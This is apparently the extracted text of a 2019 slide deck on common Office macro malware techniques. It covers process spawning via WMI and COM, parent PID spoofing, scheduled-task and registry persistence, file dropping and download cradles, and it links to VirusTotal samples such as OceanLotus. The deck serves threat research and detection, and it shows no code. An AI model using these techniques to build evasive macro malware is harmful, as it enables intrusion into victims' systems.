13. • This behavior is relatively anomalous and can easily be detected by most
modern blue-teams.
9/16/2019 Macro malware - common techniques 13
14. Spawning via WmiPrvse.exe using wmi
https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes
• New process will be spawned under “wmiprvse.exe” instead of the
Office process. The code to perform this is below:
9/16/2019 Macro malware - common techniques 14
15. Spawning via ShellCOM
• https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
• https://github.com/tyranid/oleviewdotnet (James Forshaw)
9/16/2019 Macro malware - common techniques 15
16. Spawning via ShellCOM
• Sample code using ShellBrowserWindow :
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
9/16/2019 Macro malware - common techniques 16
17. Spawning via ShellCOM
• Sample code using ShellWindows :
9/16/2019 Macro malware - common techniques 17
18. Parent PID Spoofing with CreateProcessA
• The API call CreateProcessA supports a parameter called “lpStartupInfo”
where you can essentially define the parent process you want to use.
– lpStartupInfo parameter points to a STARTUPINFOEX structure
9/16/2019 Macro malware - common techniques 18
19. Sample in the wild
https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/
9/16/2019 Macro malware - common techniques 19
26. • VBScript supports us create Scheduled Tasks, which can be abused to not
only related to activity from Office (svchost.exe will spawn the task).
– Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger-
example--scripting-
9/16/2019 Macro malware - common techniques 26
27. Sample in the wild
https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14
9/16/2019 Macro malware - common techniques 27
28. Extract out the VBA Macro code
9/16/2019 Macro malware - common techniques 28
31. A sample of APT32 (aka OceanLotus)
https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876
9/16/2019 Macro malware - common techniques 31
37. • VBScript also allows access to the registry - allowing the storing of
payloads, modification of settings, and creation of persistence entries
directly from a macro (using WMI or WScript)
– Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--
registry
9/16/2019 Macro malware - common techniques 37
49. • Dropping files has its pros and cons. Making changes to disk can often
mean payloads are analyzed by antivirus and leave forensic artefacts. Yet
in most breaches attackers still use payloads dropped to disk due to the
convenience and ease of having a solid foothold in a network.
• In VBScript we can make use of the FileSystemObject to drop files.
9/16/2019 Macro malware - common techniques 53
50. Again another sample of #OceanLotus….
9/16/2019 Macro malware - common techniques 54
https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
57. • There are multiple ways VBScript can be used to download content. This
content can then be dropped to disk, inserted into the registry or injected
into memory.
• One of the most common and simplest methods is using the XMLHTTP
library along with ADODB to output to file.
• Another option would be to use a direct API call, for example a simple
VBScript download cradle can be implemented using
URLDownloadToFileA.
9/16/2019 Macro malware - common techniques 61